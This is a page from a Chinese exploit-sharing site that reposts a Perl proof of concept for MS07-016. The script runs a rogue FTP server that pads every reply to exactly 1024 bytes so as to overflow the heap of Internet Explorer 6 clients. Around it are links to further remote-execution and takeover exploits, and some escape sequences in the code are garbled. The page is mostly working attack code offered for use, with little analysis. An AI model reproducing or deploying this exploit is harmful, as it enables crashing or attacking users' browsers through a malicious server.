手机
当前位置:查字典教程网 >网络安全 >Exploit >MS Internet Explorer (FTP Server Response) DoS Exploit
MS Internet Explorer (FTP Server Response) DoS Exploit
摘要:#!/usr/bin/perl#MS07-016FTPServerResponsePoC#Usage:./ms07016ftp.pl[LIS...

#!/usr/bin/perl

# MS 07-016 FTP Server Response PoC

# Usage: ./ms07016ftp.pl [LISTEN_IP]

#

# Tested Against: MSIE 6.02900.2180 (SP2)

#

# Details: The response is broken into buffers, either at length 1024,

# or at 'rn'. Each buffer is apended with x00, without

# bounds checking. If the response is exctly 1024 characters

# in length, you will overflow the heap with the string x00.

use IO::Socket;

use strict;

# Create listener

my $ip=shift || '127.0.0.1';

my $sock = IO::Socket::INET->new(Listen=>1,

LocalHost=>$ip,

LocalPort=>'21',

Proto=>'tcp');

$sock or die ("Could not create listener.nMake sure no FTP server is running, and you are running this as root.n");

# Wait for initial connection and send banner

my $sock_in = $sock->accept();

print $sock_in "220 waa waa wee waarn";

# Send response code with total lenght of response = 1024

while (<$sock_in>){

my $response;

if($_ eq "USER") { $response="331 ";}

elsif($_ eq "PASS") { $response="230 ";}

elsif($_ eq "syst") { $response="215 ";}

elsif($_ eq "CWD") { $response="250 ";}

elsif($_ eq "PWD") { $response="230 ";}

else { $response="200 ";}

print $sock_in $response."A"x(1024-length($response)-2)."rn";

}

close($sock);

//http://www.heibai.net

【MS Internet Explorer (FTP Server Response) DoS Exploit】相关文章:

LoveCMS 1.6.2 Final Update Settings Remote Exploit

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

LoveCMS 1.6.2 Final Remote Code Execution Exploit

Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

MS Windows (.doc File) Malformed Pointers Denial of Service Exploit

Dana IRC 1.4a Remote Buffer Overflow Exploit

PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

精品推荐
分类导航